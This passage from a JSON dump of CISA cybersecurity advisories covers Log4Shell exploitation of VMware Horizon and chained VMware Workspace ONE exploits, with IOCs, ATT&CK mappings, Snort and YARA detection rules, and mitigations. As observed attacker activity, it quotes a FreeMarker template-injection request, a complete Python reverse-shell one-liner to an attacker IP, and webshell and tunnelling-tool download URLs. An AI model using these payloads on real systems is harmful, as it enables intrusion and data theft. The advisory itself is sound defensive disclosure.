memory. The executable attempts communication with the remote C2 address `134.119.177[.]107`. \n * `praiser.exe` is a Windows loader containing an encrypted executable. When executed, `praiser.exe` decrypts and loads the executable into memory. The executable attempts connection to hard-coded C2 address `162.245.190[.]203`.\n * `fontdrvhosts.exe` is a Windows loader that contains an encrypted executable. When executed, fontdrvhosts.exe decrypts and loads the executable into memory. The executable attempts connection to hard-coded C2 address `155.94.211[.]207`.\n * `winds.exe` is a Windows loader containing an encrypted malicious executable and was found on a server running as a service. During runtime, the encrypted executable is decrypted and loaded into memory. The executable attempts communication with hard-coded C2 address `185.136.163[.]104`. `winds.exe` has complex obfuscation, hindering the analysis of its code structures. The executable\u2019s inbound and outbound communications are encrypted with an XOR key [[T1573.001](<https://attack.mitre.org/versions/v11/techniques/T1573/001/>)].\n\nFor more information on these malware samples, including IOCs and detection signatures, see [MAR-10382580-1](<https://cisa.gov/uscert/ncas/analysis-reports/ar22-174b>).\n\nAdditionally, CISA identified a Java\u00ae Server Pages (JSP) application (`error_401.js`) functioning as a malicious webshell [[T505.003](<https://attack.mitre.org/versions/v11/techniques/T1505/003/>)] and a malicious Dynamic Link Library (DLL) file:\n\n * `error_401.jsp` is a webshell designed to parse data and commands from incoming HTTP requests, providing a remote operator C2 capabilities over compromised Linux and Windows systems. `error_401.jsp` allows actors to retrieve files from the target system, upload files to the target system, and execute commands on the target system. `rtelnet` is used to execute commands on the target system. Commands and data sent are encrypted via RC4 [[T1573.001](<https://attack.mitre.org/versions/v11/techniques/T1573/001/>)]. For more information on `error_401.jsp`, including IOCs, see [MAR-10382580 2].\n * `newdev.dll` ran as a service in the profile of a known compromised user on a mail relay server. The malware had path: `C:\\Users\\<user>\\AppData\\Roaming\\newdev.dll`. The DLL may be the same `newdev.dll` attributed to the APT actors in [open-source reporting](<https://www.fortinet.com/blog/threat-research/deep-panda-log4shell-fire-chili-rootkits>); however, CISA was unable to recover the file for analysis. \n\nThreat actors collected [[TA0009](<https://attack.mitre.org/versions/v11/tactics/TA0009/>)] and likely exfiltrated [[TA0010](<https://attack.mitre.org/versions/v11/tactics/TA0010/>)] data from Victim 2\u2019s production environment. For a three week period, the security management and certificate servers communicated with the foreign IP address `92.222.241[.]76`. During this same period, the security management server sent more than 130 gigabytes (GB) of data to foreign IP address `92.222.241[.]76`, indicating the actors likely exfiltrated data from the production environment. CISA also found `.rar` files containing sensitive law enforcement investigation data [[T1560.001](<https://attack.mitre.org/versions/v11/techniques/T1560/001/>)] under a known compromised administrator account.\n\n**Note:** the second threat actor group had access to the organization's test and production environments, and on or around April 13, 2022, leveraged CVE-2022-22954 to implant the Dingo J-spy webshell. According to trusted third-party reporting, multiple large organizations have been targeted by cyber actors leveraging CVE-2022-22954 and CVE-2022-22960. For more information on exploitation of CVE-2022-22954 and CVE-2022-22960, see CISA CSA [Threat Actors Chaining Unpatched VMware Vulnerabilities for Full System Control](<https://www.cisa.gov/uscert/ncas/alerts/aa22-138b>).\n\n### Incident Response\n\nIf administrators discover system compromise, CISA and CGCYBER recommend:\n\n 1. Immediately isolating affected systems. \n 2. Collecting and reviewing relevant logs, data, and artifacts.\n 3. Considering soliciting support from a third-party incident response organization that can provide subject matter expertise, ensure the actor is eradicated from the network, and avoid residual issues that could enable follow-on exploitation.\n 4. Reporting incidents to CISA via CISA\u2019s 24/7 Operations Center ([report@cisa.gov](<mailto:report@cisa.gov>) or 888-282-0870). To report cyber incidents to the Coast Guard pursuant to 33 CFR Section 101.305, contact the U.S. Coast Guard (USCG) National Response Center (NRC) ([NRC@uscg.mil](<mailto:NRC@uscg.mil>) or 800-424-8802). \n\n### Mitigations\n\nCISA and CGCYBER recommend organizations install updated builds to ensure affected VMware Horizon and UAG systems are updated to the latest version.\n\n * If updates or workarounds were not promptly applied following VMware\u2019s [release of updates for Log4Shell in December 2021](<https://www.vmware.com/security/advisories/VMSA-2021-0028.html>), **treat those VMware Horizon systems as compromised**. Follow the pro-active incident response procedures outlined above prior to applying updates. If no compromise is detected, apply these updates as soon as possible. \n * See VMware Security Advisory [VMSA-2021-0028.13](<https://www.vmware.com/security/advisories/VMSA-2021-0028.html>) and [VMware Knowledge Base (KB) 87073](<https://kb.vmware.com/s/article/87073>) to determine which VMware Horizon components are vulnerable.\n * **Note: **until the update is fully implemented, consider removing vulnerable components from the internet to limit the scope of traffic. While installing the updates, ensure network perimeter access controls are as restrictive as possible.\n * If upgrading is not immediately feasible, see [KB87073](<https://kb.vmware.com/s/article/87073>) and [KB87092](<https://kb.vmware.com/s/article/87092>) for vendor-provided temporary workarounds. Implement temporary solutions using an account with administrative privileges. Note that these temporary solutions should not be treated as permanent fixes; vulnerable components should be upgraded to the latest build as soon as possible. \n * Prior to implementing any temporary solution, ensure appropriate backups have been completed. \n * Verify successful implementation of mitigations by executing the vendor supplied script `Horizon_Windows_Log4j_Mitigations.zip` without parameters to ensure that no vulnerabilities remain. See [KB87073](<https://kb.vmware.com/s/article/87073>) for details. \n\nAdditionally, CISA and CGCYBER recommend organizations:\n\n * Keep all software up to date and prioritize patching [known exploited vulnerabilities (KEVs)](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>). \n * Minimize the internet-facing attack surface by hosting essential services on a segregated DMZ, ensuring strict network perimeter access controls, and not hosting internet-facing services non-essential to business operations. Where possible, implement regularly updated WAFs in front of public-facing services. WAFs can protect against web based exploitation using signatures and heuristics that are likely to block or alert on malicious traffic.\n * Use best practices for identity and access management (IAM) by implementing multifactor authentication (MFA), enforcing use of strong passwords, and limiting user access through the principle of least privilege.\n\n### Contact Information\n\nRecipients of this report are encouraged to contribute any additional information related to this threat.\n\n * To request incident response resources or technical assistance related to these threats, email CISA at [report@cisa.gov](<mailto:report@cisa.gov>). To contact Coast Guard Cyber Command in relation to these threats, email [maritimecyber@uscg.mil](<mailto:maritimecyber@uscg.mil>).\n * To report cyber incidents to the Coast Guard pursuant to 33 CFR Section 101.305 contact the USCG NRC ([NRC@uscg.mil](<mailto:NRC@uscg.mil>) or 800-424-8802).\n\n### Resources\n\n * For more information on Log4Shell, see: \n * CISA\u2019s [Apache Log4j Vulnerability Guidance](<https://www.cisa.gov/uscert/apache-log4j-vulnerability-guidance>) webpage,\n * Joint CSA [Mitigating Log4Shell and Other Log4j-Related Vulnerabilities](<https://www.cisa.gov/uscert/ncas/alerts/aa21-356a>), or\n * CISA\u2019s [database of known vulnerable services](<https://github.com/cisagov/log4j-affected-db>) on the CISA GitHub\u00ae page.\n * See National Security Agency (NSA) and Australian Signals Directorate (ASD) guidance [Block and Defend Web Shell Malware](<https://media.defense.gov/2020/Jun/09/2002313081/-1/-1/0/CSI-DETECT-AND-PREVENT-WEB-SHELL-MALWARE-20200422.PDF>) for additional guidance on hardening internet-facing systems.\n\n### References\n\n[1] VMware Security Advisory [VMSA-2021-0028.13](<https://www.vmware.com/security/advisories/VMSA-2021-0028.html>) \n[2] Fortinet\u2019s blog [New Milestones for Deep Panda: Log4Shell and Digitally Signed Fire Chili Rootkits](<https://www.fortinet.com/blog/threat-research/deep-panda-log4shell-fire-chili-rootkits>)\n\n### Appendix A: Indicators of Compromise\n\nSee [MAR-10382580-1](<https://cisa.gov/uscert/ncas/analysis-reports/ar22-174b>) and [MAR-10382254-1](<https://cisa.gov/uscert/ncas/analysis-reports/ar22-174a>) and Table 1 for IOCs. See the list below to download copies of these IOCs: \n\n * MAR-10382580-1 stix\n * MAR-10382254-1 stix\n\n**_Table 1: Indicators of Compromise_**\n\nType | Indicator | **Description** \n---|---|--- \nIP Address | `104.223.34[.]198 ` | IP address closely associated with the installation of malware on victims. \n`92.222.241[.]76 ` | Victim 2 servers communicated with this IP address and sent data to it during a three-week period. \n`109.248.150[.]13 ` | Actors attempting to download and execute a malicious file from this address. \n`104.155.149[.]103 ` | Appears to be a part of the actors\u2019 C2 infrastructure. \nNetwork Port | `192.95.20[.]8:80 ` | Same description as IP `192.95.20[.]8`, but includes the specific destination port of 80, which was identified in logs and during malware analysis. \n`1389 ` | This was the most common destination port for Log4Shell exploitation outbound connections. Multiple unique destination addresses were used for Log4Shell callback. \n`104.223.34[.]198:443 ` | IP address closely associated to the installation of malware on victims with the specific destination port of 443. \nScheduled Task | `C:\\Windows\\System32\\Tasks\\Local Session Update` | Scheduled task created by `hmsvc.exe` to execute the program hourly. \nFile Path | `C:\\Windows\\Temp\\lnk{4_RANDOM_CHARS}.tmp` | File created by `hmsvc.exe` with a random four-character filename. \n`C:\\Windows\\Temp\\lnk<4_RANDOM_NUMS_CHAR S>.tmp` | File created by `hmsvc.exe` with a random four-character filename. \n \n### Appendix B: Threat Actor TTPs\n\nSee Table 2 for the threat actors\u2019 tactics and techniques identified in this CSA. See the [MITRE ATT&amp;CK for Enterprise](<https://attack.mitre.org/versions/v11/matrices/enterprise/>) framework, version 11, for all referenced threat actor tactics and techniques.\n\n**_Table 2: Tactics and Techniques_**\n\nTactic | Technique \n---|--- \nInitial Access [[TA0001](<https://attack.mitre.org/versions/v11/tactics/TA0001/>)] | Exploit Public-Facing Application [[T1190](<https://attack.mitre.org/versions/v11/techniques/T1190/>)] \n \nExecution [[TA0002](<https://attack.mitre.org/versions/v11/tactics/TA0002/>)]\n\n| Command and Scripting Interpreter: PowerShell [[T1059.001](<https://attack.mitre.org/versions/v11/techniques/T1059/001/>)] \nScheduled Task/Job: Scheduled Task [[T1053.005](<https://attack.mitre.org/versions/v11/techniques/T1053/005/>)] \nPersistence [[TA0003](<https://attack.mitre.org/versions/v11/tactics/TA0003/>)] | Server Software Component: Web Shell [[T1505.003](<https://attack.mitre.org/versions/v11/techniques/T1505/003/>)] \nDefense Evasion [[TA0005](<https://attack.mitre.org/versions/v11/tactics/TA0005/>)] | Masquerading: Masquerade Task or Service [[T1036.004](<https://attack.mitre.org/versions/v11/techniques/T1036/004/>)] \nCredential Access [[TA0006](<https://attack.mitre.org/versions/v11/tactics/TA0006/>)] | \nLateral Movement [[TA0008](<https://attack.mitre.org/versions/v11/tactics/TA0008/>)] | Remote Services: Remote Desktop Protocol [[T1021.001](<https://attack.mitre.org/versions/v11/techniques/T1021/001/>)] \nCollection [[TA0009](<https://attack.mitre.org/versions/v11/tactics/TA0009/>)] | Archive Collected Data: Archive via Utility [[T1560.001](<https://attack.mitre.org/versions/v11/techniques/T1056/001/>)] \nInput Capture: Keylogging [[T1056.001](<https://attack.mitre.org/versions/v11/techniques/T1560/001/>)] \nCommand and Control [[TA0011](<https://attack.mitre.org/versions/v11/tactics/TA0011/>)] | Application Layer Protocol: Web Protocols [[T1071.001](<https://attack.mitre.org/versions/v11/techniques/T1071/001/>)] \nEncrypted Channel: Symmetric Cryptography [[1573.001](<https://attack.mitre.org/versions/v11/techniques/T1573/001/>)] \nIngress Tool Transfer [[T1105](<https://attack.mitre.org/versions/v11/techniques/T1105/>)] \nNon-Standard Port [[T1571](<https://attack.mitre.org/versions/v11/techniques/T1571/>)] \n| Proxy [[T1090](<https://attack.mitre.org/versions/v11/techniques/T1090/>)] \n \n### Disclaimer\n\n\u00a9 2021 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation.\n\n### Acknowledgements\n\nCISA and CGCYBER would like to thank VMware and Secureworks for their contributions to this CSA.\n\n### Revisions\n\nJune 23, 2022: Initial version|June 24, 2022: Added link to AA22-174A.stix.xml|July 18, 2022: MAR-10382580-2 stix\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-07-18T12:00:00", "type": "ics", "title": "Malicious Cyber Actors Continue to Exploit Log4Shell in VMware Horizon Systems", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2022-22954", "CVE-2022-22960"], "modified": "2022-07-18T12:00:00", "id": "AA22-174A", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa22-174a", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-03-14T18:26:53", "description": "### Summary\n\n**_Update June 2, 2022:_**\n\nThis Cybersecurity Advisory (CSA) has been updated with additional indicators of compromise (IOCs) and detection signatures, as well as tactics, techniques, and procedures (TTPs) from trusted third parties. \n\n**_Update End_**\n\nThe Cybersecurity and Infrastructure Security Agency (CISA) is releasing this CSA to warn organizations that malicious cyber actors, likely advanced persistent threat (APT) actors, are exploiting CVE-2022-22954 and CVE-2022-22960 separately and in combination. These vulnerabilities affect certain versions of VMware Workspace ONE Access, VMware Identity Manager (vIDM), VMware vRealize Automation (vRA), VMware Cloud Foundation, and vRealize Suite Lifecycle Manager. Exploiting these vulnerabilities permits malicious actors to trigger a server-side template injection that may result in remote code execution (RCE) (CVE-2022-22954) or escalation of privileges to root (CVE-2022-22960). \n\nVMware released updates for both vulnerabilities on April 6, 2022, and, according to a trusted third party, malicious cyber actors were able to reverse engineer the updates to develop an exploit within 48 hours and quickly began exploiting the disclosed vulnerabilities in unpatched devices. CISA was made aware of this exploit a week later and added CVE-2022-22954 and CVE-2022-22960 to its catalog of [Known Exploited Vulnerabilities](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) on April 14 and April 15, respectively. In accordance with [Binding Operational Directive (BOD) 22-01, Reducing the Significant Risk of Known Exploited Vulnerabilities](<https://www.cisa.gov/binding-operational-directive-22-01>), federal agencies were required to apply updates for CVE-2022-22954 and CVE-2022-22960 by May 5, and May 6, 2022, respectively\n\n**Note: **based on this activity, CISA expects malicious cyber actors to quickly develop a capability to exploit newly released vulnerabilities CVE-2022-22972 and CVE-2022-22973 in the same impacted VMware products. In response, CISA has released, [Emergency Directive (ED) 22-03 Mitigate VMware Vulnerabilities](<https://www.cisa.gov/emergency-directive-22-03>), which requires emergency action from Federal Civilian Executive Branch agencies to either immediately implement the updates in [VMware Security Advisory VMSA-2022-0014](<https://www.vmware.com/security/advisories/VMSA-2022-0014.html>) or remove the affected software from their network until the updates can be applied.\n\nCISA has deployed an incident response team to a large organization where the threat actors exploited CVE-2022-22954. Additionally, CISA has received information\u2014including IOCs\u2014about observed exploitation at multiple other large organizations from trusted third parties.\n\nThis CSA provides IOCs and detection signatures from CISA as well as from trusted third parties to assist administrators with detecting and responding to this activity. \n\n_**Update June 2, 2022:**_\n\nThis CSA also provides TTPs of this activity from trusted third parties to assist administrators with detecting and responding to this activity. \n\n_**Update End**_\n\nDue to the rapid exploitation of these vulnerabilities, CISA strongly encourages all organizations with internet-facing affected systems\u2014that did not immediately apply updates\u2014to assume compromise and initiate threat hunting activities using the detection methods provided in this CSA. If potential compromise is detected, administrators should apply the incident response recommendations included in this CSA.\n\nDownload the PDF version of this report (pdf, 349kb).\n\nFor a downloadable copy of IOCs, see AA22-138B.stix. \n\n### Technical Details\n\nCISA has deployed an incident response team to a large organization where the threat actors exploited CVE-2022-22954. Additionally, CISA has received information about observed exploitation of CVE-2022-22954 and CVE-2022-22960 by multiple threat actors at multiple other large organizations from trusted third parties.\n\n * [CVE-2022-22954](<https://nvd.nist.gov/vuln/detail/CVE-2022-22954>) enables an actor with network access to trigger a server-side template injection that may result in RCE. This vulnerability affects the following products:[[1](<https://www.vmware.com/security/advisories/VMSA-2022-0011.html>)] \n * VMware Workspace ONE Access, versions 21.08.0.1, 21.08.0.0, 20.10.0.1, 20.10.0.0\n * vIDM versions 3.3.6, 3.3.5, 3.3.4, 3.3.3\n * VMware Cloud Foundation, 4.x\n * vRealize Suite LifeCycle Manager, 8.x\n * [CVE-2022-22960](<https://nvd.nist.gov/vuln/detail/CVE-2022-22960>) enables a malicious actor with local access to escalate privileges to root due to improper permissions in support scripts. This vulnerability affects the following products:[[2](<https://www.vmware.com/security/advisories/VMSA-2022-0011.html>)] \n * VMware Workspace ONE Access, versions 21.08.0.1, 21.08.0.0, 20.10.0.1, 20.10.0.0\n * vIDM, versions 3.3.6, 3.3.5, 3.3.4, 3.3.3\n * vRA, version 7.6 \n * VMware Cloud Foundation, 3.x, 4.x, \n * vRealize Suite LifeCycle Manager, 8.x\n\nAccording to trusted third-party reporting, threat actors may chain these vulnerabilities. At one compromised organization, on or around April 12, 2022, an unauthenticated actor with network access to the web interface leveraged CVE-2022-22954 to execute an arbitrary shell command as a VMware user. The actor then exploited CVE-2022-22960 to escalate the user\u2019s privileges to root. With root access, the actor could wipe logs, escalate permissions, and move laterally to other systems. \n\n_**Update June 2, 2022:**_\n\nFor more information about this compromised organization, see the Victim 1 section.\n\n_**Update End**_\n\nThreat actors have dropped post-exploitation tools, including the Dingo J-spy webshell, a publicly available webshell that includes command execution, a file manager, a database manager, and a port scanner. During incident response activities, CISA observed, on or around April 13, 2022, threat actors leveraging CVE-2022-22954 to drop the Dingo J-spy webshell. Around the same period, a trusted third party observed threat actors leveraging CVE-2022-22954 to drop the Dingo J-spy webshell at one other organization. According to the third party, the actors may have also dropped the Dingo J-spy webshell at a third organization. **Note:** analysis of the first compromise and associated malware is ongoing, and CISA will update information about this case as we learn more.\n\n**_Update June 2, 2022:_**\n\nThe following sections include additional information, including IOCs and TTPs, from trusted third parties about two confirmed compromises. See the appendix for TTPs in this CSA mapped to the MITRE ATT&amp;CK for Enterprise framework.\n\n### Victim 1 \n\nThe trusted third party assesses that multiple threat actors (referred to as Threat Actor 1 [TA1] and Threat Actor 2 [TA2]) gained access to a public-facing server running VMWare Workspace ONE Access. TA1 downloaded a malicious shell script, which they used to collect and exfiltrate sensitive data. TA2 interacted with the server (without automation or scripts) and installed multiple webshells and a reverse secure socket (SOCKS) proxy.\n\n#### **Threat Actor 1**\n\nOn April 12, TA1 exploited CVE 2022-22954 [[T1203](<https://attack.mitre.org/versions/v11/techniques/T1203>)] to download [[T1105](<https://attack.mitre.org/versions/v11/techniques/T1105/>)] a malicious shell script [[T1059](<https://attack.mitre.org/versions/v11/techniques/T1059/>)] from `https://20.232.97[.]189/up/80b6ae2cea.sh`. \n\nTA1 first targeted Freemarker\u2014a legitimate application that allows for customized notifications by creating templates\u2014to send the following customized GET request URI to the compromised server [[T1071.001](<https://attack.mitre.org/versions/v11/techniques/T1071/001/>)]:\n\n`GET /catalog-portal/ui/oauth/verify?error=&deviceUdid=%24%7B%22freemarker.template.utility.Execute%22%3Fnew%28%29%28%22cat%20/usr/local/horizon/conf/system-config.properties%22%29%7DHTTP/1.1`\n\nThe GET request resulted in the server downloading the malicious shell script, `80b6ae2cea[.]sh`, to VMware Workspace ONE Access `directory` `/usr/local/horizon/scripts/`. TA1 then chained CVE 2022-22960 to the initial exploit to run the shell script with root privileges ([[T1068](<https://attack.mitre.org/versions/v11/techniques/T1068/>)], [[TA0004](<https://attack.mitre.org/versions/v11/tactics/TA0004/>)]). The script was executed with the `SUDO` command.\n\nThe script, which contained VMware Workspace ONE Access directory paths and file locations, was developed for data exfiltration [[TA0010](<https://attack.mitre.org/versions/v11/tactics/TA0010/>)]. The malicious script collected [[TA0009](<https://attack.mitre.org/versions/v11/tactics/TA0009/>)] sensitive files\u2013including user names, passwords, master keys, and firewall rules\u2013and stored them in a \u201ctar ball\u201d (a \u201ctar ball\u201d is a compressed and zipped file used by threat actors for collection and exfiltration) [[T1560](<https://attack.mitre.org/versions/v11/techniques/T1560/>)]. The tar ball was located in a VMWare Workspace ONE Access directory: `/opt/vmware/horizon/workspace/webapps/SAAS/horizon/images/`.\n\nThe malicious script then deleted evidence of compromise [[TA0005](<https://attack.mitre.org/versions/v11/tactics/TA0005/>)] by modifying logs to their original state and deleting files [[T1070](<https://attack.mitre.org/versions/v11/techniques/T1070/>)]. TA1 deleted many files and logs, including `fd86ald0.pem`, `localhost_access logs`, logs associated with the VMWare Horizon application, and greenbox logs for the date of activity (April 12). \n\n**Note:** CISA received a similar malicious Bash script for analysis from a trusted third party at a different known compromise. See Victim 2 section for more information.\n\nOn April 12, TA1 also downloaded `jtest.jsp`, a JSP webshell, to the server\u2019s web directory `/SAAS/Horizon/js-lib/` from IP address `186.233.187[.]245`.\n\nTA1 returned to the server on April 12 to collect sensitive data stored in the \u201ctar ball\u201d by GET request.\n\n#### **Threat Actor 2**\n\nOn April 13 and 14, TA2 sent many GET requests to the server exploiting\u2014or attempting to exploit\u2014CVE 2022-22954 to obtain RCE, upload binaries, and upload webshells [[T1505.003](<https://attack.mitre.org/versions/v11/techniques/T1505/003/>)] for persistence [[TA0003](<https://attack.mitre.org/versions/v11/tactics/TA0003/>)].\n\n * On April 13, TA2 attempted to download a webshell `app.jsp` (MD5 `4cd8366345ad4068feca4d417738b4b`d) from IP address `51.79.171[.]53`. `app.jsp` is a publicly available [[T1588.001](<https://attack.mitre.org/versions/v11/techniques/T1588/001/>)] webshell known as Godzilla.\n * On April 13, TA2 downloaded a JSP webshell (MD 5 `F8FF5C72E8FFA2112B01802113148BD1`) from `http://84.38.133[.]149/img/icon1.gif`.\n * On April 13, TA2 sent thousands of Unix commands [[T1059.004](<https://attack.mitre.org/versions/v11/techniques/T1059/004/>)] from IP address `84.38.133[.]149`, some of which enabled TA2 to view `/etc/passwd` and `/etc/shadow` password files ([[TA0006](<https://attack.mitre.org/versions/v11/tactics/TA0006/>)], [[T1003.008](<https://attack.mitre.org/versions/v11/techniques/T1003/008/>)]). The Unix commands included `whoami`, `id`, and `cat`.\n\nThe trusted third party found two copies of the Dingo J-spy webshell (MD5 `5b0bfda04a1e0d8dcb02556dc4e56e6a`) in web directories: `horizon_all.jsp` was in the `/opt/vmware/horizon/workspace/webapps/SAAS/horizon/portal/` web directory and `jquery.jsp` was in the `/webapps/cas/static/` directory. The third party was unable to determine how and when the webshells were created. TA2 used `POST` requests to communicate with the Dingo J-spy webshells. The commands and output were encrypted with an XOR key [[T1573.001](<https://attack.mitre.org/versions/v11/techniques/T1573/001/>)].\n\nOn April 14, TA2 downloaded a reverse SOCKS proxy [[T1090](<https://attack.mitre.org/versions/v11/techniques/T1090/>)]. TA2 first sent a GET request with the `CHMOD `command to change the permissions of `.tmp12865xax`, a hidden file in the `/tmp` directory [[T1222.002](<https://attack.mitre.org/versions/v11/techniques/T1222/002/>)]. The actor then downloaded a binary (MD5 ` dc88c5fe715b5f706f9fb92547da948a`) from https://github[.]com/kost/revsocks/releases/download/v1.1.0/revsocks_linux_amd64. The binary is a reverse socks5 tunneling binary with TLS/SSL support and connects to `https://149.248.35[.]200.sslip.io`.\n\n#### _Additional Threat Actor Activity_\n\nThe trusted third party observed additional threat actor activity that does not seem to be related to TA1 or TA2. On 13 April, IP address `172.94.89[.]112` attempted to connect a reverse shell on the compromised server to IP Address `100.14.239[.]83` on port 5410. The threat actor used the following command:\n\n`freemarker.template.utility.Execute\\\"?new()(\\\"/usr/bin/python3.7 -c \\\\'importsocket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s. connect((\\\\\\\"100[.]14[.]239[.]83\\\\\\\",5410));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call([\\\\\\\"/usr/bin/sh\\\\\\\",\\\\\\\"- i\\\\\\\"]);\\\\'\\\")} `\n\n### Victim 2 \n\nCISA received a related malicious Bash script for analysis from a trusted third party. The analyzed script, deployed on or around April 12, exploits CVE 2022-22960 and allows a Horizon user to escalate privileges and execute commands and scripts as a superuser (`sudo`). The Bash script also allows the user to collect network information and additional information.\n\nThe script overwrites the `publishCaCert.hzn` script on `fd86ald0.pem` file and executes commands that compress a list of files containing information such as network interface configuration, list of users, passwords, masterkeys, hosts, and domains to a TAR archive. The TAR archive, located in a VMWare Workspace ONE Access directory, `/opt/vmware/horizon/workspace/webapps/SAAS/horizon/images/`, is assigned read and write permissions to the Horizon web user and read to all users. \n\nThe malicious script deletes evidence of compromise by overwriting `publishCaCert.hzn` with `fd86ald0.pem` and then removing `fd86ald0.pem`.\n\nThe trusted third party observed the following IPs downloading, executing, and checking the bash script.\n\n * `45.72.112[.]245`\n * `115.167.53[.]141`\n * `191.102.179[.]197`\n * `209.127.110[.]126`\n * `45.72.85[.]172`\n * `192.241.67[.]12`\n\nThe trusted third party observed the following additional malicious IPs:\n\n * `20.232.97[.]189` \u2013 used for command for control [TA0011]\n * `194.31.98[.]141` \u2013 attempted to download MoneroOcean miner from Github\n * `8.45.41[.]114` \u2013 ran `cat` on a number of files in `/usr/local/horizon/conf`\n * `85.203.36[.]66` \u2013 attempted to pull down a JSP webshell from `http://84.38.133[.]149/img/icon.gif`\n\n_**Update End**_\n\n### Detection Methods\n\n#### Signatures\n\n**Note:** servers vulnerable to CVE-2022-22954 may use Hypertext Transfer Protocol Secure (HTTPS) to encrypt client/server communications. Secure Sockets Layer (SSL)/Transport Layer Security (TLS) decryption can be used as a workaround for network-based detection and threat hunting efforts.\n\nThe following CISA-created Snort signature may detect malicious network traffic related to exploitation of CVE-2022-22954:\n\n`alert tcp any any -> any $HTTP_PORTS (msg:\"VMware:HTTP GET URI contains '/catalog-portal/ui/oauth/verify?error=&deviceUdid=':CVE-2022-22954\"; sid:1; rev:1; flow:established,to_server; content: \"GET\"; http_method; content:\"/catalog-portal/ui/oauth/verify?error=&deviceUdid=\"; http_uri; reference:cve,2022-22954; reference:url,github.com/sherlocksecurity/VMware-CVE-2022-22954;`\n\n`reference:url,github.com/tunelko/CVE-2022-22954-PoC/blob/main/CVE-2022-22954.py; priority:2; metadata:service http;)`\n\nThe following third-party Snort signature may detect exploitation of VMware Workspace ONE Access server-side template injection:\n\n`10000001alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:\"Workspace One Serverside Template Injection\";content:\"GET\"; http_method; content:\"freemarker.template.utility.Execute\";nocase; http_uri; priority:1; sid:;rev:1;)`\n\n_**Update June 2, 2022:**_\n\n`alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:\"Workspace One Serverside Template Injection\";content:\"GET\"; http_method; content:\"freemarker.template.utility.Execute\";nocase; http_uri; priority:1; sid:100000001;rev:1;) `\n\n_**Update End**_\n\nThe following third-party YARA rule may detect unmodified instances of the Dingo J-spy webshell on infected hosts:\n\n`rule dingo_jspy_webshell \n{ \nstrings: \n$string1 = \"dingo.length\" \n$string2 = \"command = command.trim\" \n$string3 = \"commandAction\" \n$string4 = \"PortScan\" \n$string5 = \"InetAddress.getLocalHost\" \n$string6 = \"DatabaseManager\" \n$string7 = \"ExecuteCommand\" \n$string8 = \"var command = form.command.value\" \n$string9 = \"dingody.iteye.com\" \n$string10 = \"J-Spy ver\" \n$string11 = \"no permission ,die\" \n$string12 = \"int iPort = Integer.parseInt\" \ncondition: \nfilesize < 50KB and 12 of ($string*) \n}`\n\n**Note: **the Dingo J-spy webshell is an example of post-exploitation tools that actors have used. Administrators should examine their network for any sign of post-exploitation activity.\n\n**_Update June 2, 2022:_**\n\nThe following third-party YARA rule may detect unmodified instances of the Godzilla webshell on infected hosts:\n\n`rule Godzilla_Webshell \n{ \nstrings: \n$string1 = \"TomcatListenerMemShellFromThread\" \n$string2 = \"String xc =\" \n$string3 = \"String pass =\" \n$string4 = \"ServletRequestListener\" \n$string5 = \"cmds = new String\" \n$string6 = \"cmd\" \n$string7 = \"bin/bash\" \n$string8 = \"getInputStream\" \n$string9 = \"javax.crypto.Cipher c = javax.crypto.Cipher.getInstance\" \n$string10 = \"godzilla\" \ncondition: \nfilesize < 20KB and 10 of ($string*) \n} `\n\nThe following third-party YARA rule may detect unmodified instances of the TomCat JSP webshell on infected hosts:\n\n`rule Tomcatjsp_Webshell \n{ \nstrings: \n$string1 = \"ExecShellCmd\" \n$string2 = \"stCommParams\" \n$string3 = \"nKeyOffset = EncryptData\" \n$string4 = \"InputStream is = process.getInputStream\" \n$string5 = \"Process process = Runtime.getRuntime\" \n$string6 = \"ExecBinary\" \n$string7 = \"byte bzKey\" \n$string8 = \"nKeyOffset++\" \n$string9 = \"HttpServletRequest request, HttpServletResponse response\" $string10 = \"connect_test cmd\" \n$string11 = \"exec cmd\" \n$string12 = \"file upload\" \ncondition: \nfilesize < 25KB and 12 of ($string*) \n} ` \n\n\nThe following third-party YARA rule may detect unmodified instances of the reverse SOCKS proxy on infected hosts.\n\n`rule reversesocks_tool \n{ \nmd5 = \"dc88c5fe715b5f706f9fb92547da948a\" strings: \n$string1 = \"revsocks\" \n$string2 = \"-connect\" \n$string3 = \"client:8080 -pass test\" \n$string4 = \"RSA TESTING KEY\" \n$string5 = \"SETTINGS_MAX_CONCURRENT_STREAMS\" $string6 = \"Start on the server:\" \n$string7 = \"closing connection\" \n$string8 = \"socks 127.0.0.1:1080\" \n$string9 = \"revsocks -listen :8080\" \ncondition: \nuint16(0) == 0x457F and filesize < 6MB and 8 of ($string*) } `\n\n_**Update End**_\n\n#### Behavioral Analysis and Indicators of Compromise\n\nAdministrators should conduct behavioral analysis on root accounts of vulnerable systems by: \n\n * Using the indicators listed in table 1 to detect potential malicious activity.\n * Reviewing systems logs and gaps in logs.\n * Reviewing abnormal connections to other assets.\n * Searching the 